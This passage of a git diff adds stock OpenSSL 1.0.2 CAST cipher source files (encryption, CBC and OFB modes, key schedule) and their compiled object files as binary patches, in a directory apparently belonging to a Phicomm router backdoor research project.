+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <openssl/cast.h>
+#include "cast_lcl.h"
+
+void CAST_encrypt(CAST_LONG *data, const CAST_KEY *key)
+{
+    register CAST_LONG l, r, t;
+    const register CAST_LONG *k;
+
+    k = &(key->data[0]);
+    l = data[0];
+    r = data[1];
+
+    E_CAST(0, k, l, r, +, ^, -);
+    E_CAST(1, k, r, l, ^, -, +);
+    E_CAST(2, k, l, r, -, +, ^);
+    E_CAST(3, k, r, l, +, ^, -);
+    E_CAST(4, k, l, r, ^, -, +);
+    E_CAST(5, k, r, l, -, +, ^);
+    E_CAST(6, k, l, r, +, ^, -);
+    E_CAST(7, k, r, l, ^, -, +);
+    E_CAST(8, k, l, r, -, +, ^);
+    E_CAST(9, k, r, l, +, ^, -);
+    E_CAST(10, k, l, r, ^, -, +);
+    E_CAST(11, k, r, l, -, +, ^);
+    if (!key->short_key) {
+        E_CAST(12, k, l, r, +, ^, -);
+        E_CAST(13, k, r, l, ^, -, +);
+        E_CAST(14, k, l, r, -, +, ^);
+        E_CAST(15, k, r, l, +, ^, -);
+    }
+
+    data[1] = l & 0xffffffffL;
+    data[0] = r & 0xffffffffL;
+}
+
+void CAST_decrypt(CAST_LONG *data, const CAST_KEY *key)
+{
+    register CAST_LONG l, r, t;
+    const register CAST_LONG *k;
+
+    k = &(key->data[0]);
+    l = data[0];
+    r = data[1];
+
+    if (!key->short_key) {
+        E_CAST(15, k, l, r, +, ^, -);
+        E_CAST(14, k, r, l, -, +, ^);
+        E_CAST(13, k, l, r, ^, -, +);
+        E_CAST(12, k, r, l, +, ^, -);
+    }
+    E_CAST(11, k, l, r, -, +, ^);
+    E_CAST(10, k, r, l, ^, -, +);
+    E_CAST(9, k, l, r, +, ^, -);
+    E_CAST(8, k, r, l, -, +, ^);
+    E_CAST(7, k, l, r, ^, -, +);
+    E_CAST(6, k, r, l, +, ^, -);
+    E_CAST(5, k, l, r, -, +, ^);
+    E_CAST(4, k, r, l, ^, -, +);
+    E_CAST(3, k, l, r, +, ^, -);
+    E_CAST(2, k, r, l, -, +, ^);
+    E_CAST(1, k, l, r, ^, -, +);
+    E_CAST(0, k, r, l, +, ^, -);
+
+    data[1] = l & 0xffffffffL;
+    data[0] = r & 0xffffffffL;
+}
+
+void CAST_cbc_encrypt(const unsigned char *in, unsigned char *out,
+                      long length, const CAST_KEY *ks, unsigned char *iv,
+                      int enc)
+{
+    register CAST_LONG tin0, tin1;
+    register CAST_LONG tout0, tout1, xor0, xor1;
+    register long l = length;
+    CAST_LONG tin[2];
+
+    if (enc) {
+        n2l(iv, tout0);
+        n2l(iv, tout1);
+        iv -= 8;
+        for (l -= 8; l >= 0; l -= 8) {
+            n2l(in, tin0);
+            n2l(in, tin1);
+            tin0 ^= tout0;
+            tin1 ^= tout1;
+            tin[0] = tin0;
+            tin[1] = tin1;
+            CAST_encrypt(tin, ks);
+            tout0 = tin[0];
+            tout1 = tin[1];
+            l2n(tout0, out);
+            l2n(tout1, out);
+        }
+        if (l != -8) {
+            n2ln(in, tin0, tin1, l + 8);
+            tin0 ^= tout0;
+            tin1 ^= tout1;
+            tin[0] = tin0;
+            tin[1] = tin1;
+            CAST_encrypt(tin, ks);
+            tout0 = tin[0];
+            tout1 = tin[1];
+            l2n(tout0, out);
+            l2n(tout1, out);
+        }
+        l2n(tout0, iv);
+        l2n(tout1, iv);
+    } else {
+        n2l(iv, xor0);
+        n2l(iv, xor1);
+        iv -= 8;
+        for (l -= 8; l >= 0; l -= 8) {
+            n2l(in, tin0);
+            n2l(in, tin1);
+            tin[0] = tin0;
+            tin[1] = tin1;
+            CAST_decrypt(tin, ks);
+            tout0 = tin[0] ^ xor0;
+            tout1 = tin[1] ^ xor1;
+            l2n(tout0, out);
+            l2n(tout1, out);
+            xor0 = tin0;
+            xor1 = tin1;
+        }
+        if (l != -8) {
+            n2l(in, tin0);
+            n2l(in, tin1);
+            tin[0] = tin0;
+            tin[1] = tin1;
+            CAST_decrypt(tin, ks);
+            tout0 = tin[0] ^ xor0;
+            tout1 = tin[1] ^ xor1;
+            l2nn(tout0, tout1, out, l + 8);
+            xor0 = tin0;
+            xor1 = tin1;
+        }
+        l2n(xor0, iv);
+        l2n(xor1, iv);
+    }
+    tin0 = tin1 = tout0 = tout1 = xor0 = xor1 = 0;
+    tin[0] = tin[1] = 0;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/c_enc.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/c_enc.o
new file mode 100644
index 0000000000000000000000000000000000000000..d515438ccbc7cd82c3706c792229192ae49a8405
GIT binary patch
literal 5568
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
Ut^bJTV)A<=|J`0;jBDlp1M+l}ZU6uP

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/c_ofb64.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/c_ofb64.c
new file mode 100644
index 0000000..4e0a7c2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/c_ofb64.c
@@ -0,0 +1,110 @@
+/* crypto/cast/c_ofb64.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <openssl/cast.h>
+#include "cast_lcl.h"
+
+/*
+ * The input and output encrypted as though 64bit ofb mode is being used.
+ * The extra state information to record how much of the 64bit block we have
+ * used is contained in *num;
+ */
+void CAST_ofb64_encrypt(const unsigned char *in, unsigned char *out,
+                        long length, const CAST_KEY *schedule,
+                        unsigned char *ivec, int *num)
+{
+    register CAST_LONG v0, v1, t;
+    register int n = *num;
+    register long l = length;
+    unsigned char d[8];
+    register char *dp;
+    CAST_LONG ti[2];
+    unsigned char *iv;
+    int save = 0;
+
+    iv = ivec;
+    n2l(iv, v0);
+    n2l(iv, v1);
+    ti[0] = v0;
+    ti[1] = v1;
+    dp = (char *)d;
+    l2n(v0, dp);
+    l2n(v1, dp);
+    while (l--) {
+        if (n == 0) {
+            CAST_encrypt((CAST_LONG *)ti, schedule);
+            dp = (char *)d;
+            t = ti[0];
+            l2n(t, dp);
+            t = ti[1];
+            l2n(t, dp);
+            save++;
+        }
+        *(out++) = *(in++) ^ d[n];
+        n = (n + 1) & 0x07;
+    }
+    if (save) {
+        v0 = ti[0];
+        v1 = ti[1];
+        iv = ivec;
+        l2n(v0, iv);
+        l2n(v1, iv);
+    }
+    t = v0 = v1 = ti[0] = ti[1] = 0;
+    *num = n;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/c_ofb64.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/c_ofb64.o
new file mode 100644
index 0000000000000000000000000000000000000000..a42f14cf0c3911552d57181534b4b41adc5da151
GIT binary patch
literal 1920
zcmbu9K~EDw6o99+Kvi6-!32XLJycU8Y_`y7;XpctmVp#Wpw)xorY*%1XiM5{0){9_
zgJG?x|H8lEkpzgw12JAac=Td|7eh>pQP=l&XQ0&OqA!_w?|n0G-s{ZUK8nU;O%4YU
z;vhrh$P<*1u&d5C%`iDj+Q>nB_YZn|O#eV{P3U_xIi~-ji3xot$@Fj2tont~nupdd
z&a#^8vLE7@KH>`nwrDNvVw<ZzfBRcKfphyCSm-h5;P|F%C>k(eLBZ{AHn8Y(Yg6kV
zEB#F0V|v`zNsZS`U-fxDV<|N_fz^Pr8X)sT1z3-11zF~RK1mX0>>AsBiJ&rO>{dUu
zZX}KUm(g`YyMWO(%ndbAy~9T#rHks_3}9%M^;>mo&1NcA-C=iT=v_KP?@@J|j1CVE
zdi}|CrJz;319HEt^agHJOgHebPmz`2RSTO}1`}SR2SziD(VI!qM93C0Ck&JhOA*I|
zDdJf6IJ(+e-7nxl;=nKQwcn^?lIM9-RO)=@j7r{3S5)#pZ61-7$1NjLsM<OrtvQ<B
zOCc&LRPsk8Z$#>hNS=t~=4YIw@a<jXt6{h9wCxP6T~vQO%4z=E;|x6~Y55zPy!8Zb
zU$xV`#p5Aoz&&4Ar+HVvx?$kGH%btI9j7O7l2MCu>FYr`Lx$;e!gADXAyZme(ug`5
zpN!DBIvI;iM-ys-M&eP`+IYA{Eo-UFf||)KsB@|LMPASv*VqgA8-5y=?AP(OI_~8h
z`UiXHNaXTLUQ4BkT-HjK&IzlOT};VZc3C6xY)VTJIbALjIaAE%vjt#<qL!7RCwt8T
zxqrV<k(WxvrEE!CA+mWwHmA;&Qu*vr&i}By5Q{z6*b!l1DB}Gr&)O?&)Lk&}&cZP2
zWrMe*!r^Jqm`8L{C+Al<Z|vY9+-xI_xCi#&ng1FefLJ_J)Cs03BL6i3xEA?^9t1Az
z`mOVJ&}Q#AF#PI{^$_?=Jl+d-y@>l0EDZ*3ZH&kNER>w34(G=B8CbD<zgPT1#XI5q
zVXTN3+%7jJ`_A)+xW;ellubOc#<v4R6b`4*sS|$OAvp(@UHm%^#rG`&8sq-}fjHRZ

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/c_skey.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/c_skey.c
new file mode 100644
index 0000000..bbb6d56
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/c_skey.c
@@ -0,0 +1,175 @@
+/* crypto/cast/c_skey.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <openssl/crypto.h>
+#include <openssl/cast.h>
+#include "cast_lcl.h"
+#include "cast_s.h"
+
+#define CAST_exp(l,A,a,n) \
+        A[n/4]=l; \
+        a[n+3]=(l    )&0xff; \
+        a[n+2]=(l>> 8)&0xff; \
+        a[n+1]=(l>>16)&0xff; \
+        a[n+0]=(l>>24)&0xff;
+
+#define S4 CAST_S_table4
+#define S5 CAST_S_table5
+#define S6 CAST_S_table6
+#define S7 CAST_S_table7
+void CAST_set_key(CAST_KEY *key, int len, const unsigned char *data)
+#ifdef OPENSSL_FIPS
+{
+    fips_cipher_abort(CAST);
+    private_CAST_set_key(key, len, data);
+}
+
+void private_CAST_set_key(CAST_KEY *key, int len, const unsigned char *data)
+#endif
+{
+    CAST_LONG x[16];
+    CAST_LONG z[16];
+    CAST_LONG k[32];
+    CAST_LONG X[4], Z[4];
+    CAST_LONG l, *K;
+    int i;
+
+    for (i = 0; i < 16; i++)
+        x[i] = 0;
+    if (len > 16)
+        len = 16;
+    for (i = 0; i < len; i++)
+        x[i] = data[i];
+    if (len <= 10)
+        key->short_key = 1;
+    else
+        key->short_key = 0;
+
+    K = &k[0];
+    X[0] = ((x[0] << 24) | (x[1] << 16) | (x[2] << 8) | x[3]) & 0xffffffffL;
+    X[1] = ((x[4] << 24) | (x[5] << 16) | (x[6] << 8) | x[7]) & 0xffffffffL;
+    X[2] = ((x[8] << 24) | (x[9] << 16) | (x[10] << 8) | x[11]) & 0xffffffffL;
+    X[3] =
+        ((x[12] << 24) | (x[13] << 16) | (x[14] << 8) | x[15]) & 0xffffffffL;
+
+    for (;;) {
+        l = X[0] ^ S4[x[13]] ^ S5[x[15]] ^ S6[x[12]] ^ S7[x[14]] ^ S6[x[8]];
+        CAST_exp(l, Z, z, 0);
+        l = X[2] ^ S4[z[0]] ^ S5[z[2]] ^ S6[z[1]] ^ S7[z[3]] ^ S7[x[10]];
+        CAST_exp(l, Z, z, 4);
+        l = X[3] ^ S4[z[7]] ^ S5[z[6]] ^ S6[z[5]] ^ S7[z[4]] ^ S4[x[9]];
+        CAST_exp(l, Z, z, 8);
+        l = X[1] ^ S4[z[10]] ^ S5[z[9]] ^ S6[z[11]] ^ S7[z[8]] ^ S5[x[11]];
+        CAST_exp(l, Z, z, 12);
+
+        K[0] = S4[z[8]] ^ S5[z[9]] ^ S6[z[7]] ^ S7[z[6]] ^ S4[z[2]];
+        K[1] = S4[z[10]] ^ S5[z[11]] ^ S6[z[5]] ^ S7[z[4]] ^ S5[z[6]];
+        K[2] = S4[z[12]] ^ S5[z[13]] ^ S6[z[3]] ^ S7[z[2]] ^ S6[z[9]];
+        K[3] = S4[z[14]] ^ S5[z[15]] ^ S6[z[1]] ^ S7[z[0]] ^ S7[z[12]];
+
+        l = Z[2] ^ S4[z[5]] ^ S5[z[7]] ^ S6[z[4]] ^ S7[z[6]] ^ S6[z[0]];
+        CAST_exp(l, X, x, 0);
+        l = Z[0] ^ S4[x[0]] ^ S5[x[2]] ^ S6[x[1]] ^ S7[x[3]] ^ S7[z[2]];
+        CAST_exp(l, X, x, 4);
+        l = Z[1] ^ S4[x[7]] ^ S5[x[6]] ^ S6[x[5]] ^ S7[x[4]] ^ S4[z[1]];
+        CAST_exp(l, X, x, 8);
+        l = Z[3] ^ S4[x[10]] ^ S5[x[9]] ^ S6[x[11]] ^ S7[x[8]] ^ S5[z[3]];
+        CAST_exp(l, X, x, 12);
+
+        K[4] = S4[x[3]] ^ S5[x[2]] ^ S6[x[12]] ^ S7[x[13]] ^ S4[x[8]];
+        K[5] = S4[x[1]] ^ S5[x[0]] ^ S6[x[14]] ^ S7[x[15]] ^ S5[x[13]];
+        K[6] = S4[x[7]] ^ S5[x[6]] ^ S6[x[8]] ^ S7[x[9]] ^ S6[x[3]];
+        K[7] = S4[x[5]] ^ S5[x[4]] ^ S6[x[10]] ^ S7[x[11]] ^ S7[x[7]];
+
+        l = X[0] ^ S4[x[13]] ^ S5[x[15]] ^ S6[x[12]] ^ S7[x[14]] ^ S6[x[8]];
+        CAST_exp(l, Z, z, 0);
+        l = X[2] ^ S4[z[0]] ^ S5[z[2]] ^ S6[z[1]] ^ S7[z[3]] ^ S7[x[10]];
+        CAST_exp(l, Z, z, 4);
+        l = X[3] ^ S4[z[7]] ^ S5[z[6]] ^ S6[z[5]] ^ S7[z[4]] ^ S4[x[9]];
+        CAST_exp(l, Z, z, 8);
+        l = X[1] ^ S4[z[10]] ^ S5[z[9]] ^ S6[z[11]] ^ S7[z[8]] ^ S5[x[11]];
+        CAST_exp(l, Z, z, 12);
+
+        K[8] = S4[z[3]] ^ S5[z[2]] ^ S6[z[12]] ^ S7[z[13]] ^ S4[z[9]];
+        K[9] = S4[z[1]] ^ S5[z[0]] ^ S6[z[14]] ^ S7[z[15]] ^ S5[z[12]];
+        K[10] = S4[z[7]] ^ S5[z[6]] ^ S6[z[8]] ^ S7[z[9]] ^ S6[z[2]];
+        K[11] = S4[z[5]] ^ S5[z[4]] ^ S6[z[10]] ^ S7[z[11]] ^ S7[z[6]];
+
+        l = Z[2] ^ S4[z[5]] ^ S5[z[7]] ^ S6[z[4]] ^ S7[z[6]] ^ S6[z[0]];
+        CAST_exp(l, X, x, 0);
+        l = Z[0] ^ S4[x[0]] ^ S5[x[2]] ^ S6[x[1]] ^ S7[x[3]] ^ S7[z[2]];
+        CAST_exp(l, X, x, 4);
+        l = Z[1] ^ S4[x[7]] ^ S5[x[6]] ^ S6[x[5]] ^ S7[x[4]] ^ S4[z[1]];
+        CAST_exp(l, X, x, 8);
+        l = Z[3] ^ S4[x[10]] ^ S5[x[9]] ^ S6[x[11]] ^ S7[x[8]] ^ S5[z[3]];
+        CAST_exp(l, X, x, 12);
+
+        K[12] = S4[x[8]] ^ S5[x[9]] ^ S6[x[7]] ^ S7[x[6]] ^ S4[x[3]];
+        K[13] = S4[x[10]] ^ S5[x[11]] ^ S6[x[5]] ^ S7[x[4]] ^ S5[x[7]];
+        K[14] = S4[x[12]] ^ S5[x[13]] ^ S6[x[3]] ^ S7[x[2]] ^ S6[x[8]];
+        K[15] = S4[x[14]] ^ S5[x[15]] ^ S6[x[1]] ^ S7[x[0]] ^ S7[x[13]];
+        if (K != k)
+            break;
+        K += 16;
+    }
+
+    for (i = 0; i < 16; i++) {
+        key->data[i * 2] = k[i];
+        key->data[i * 2 + 1] = ((k[i + 16]) + 16) & 0x1f;
+    }
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/c_skey.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/c_skey.o
new file mode 100644
index 0000000000000000000000000000000000000000..f3cff8082ae2e03ebd9010f6a93f7fef2d06cc2f
GIT binary patch
literal 12488
zcmbulc{tTw)IWU8L&ub{$kZV+cM_sF92{jTW0_~lQ093S$4N33lBvuIktwrGN#=+`
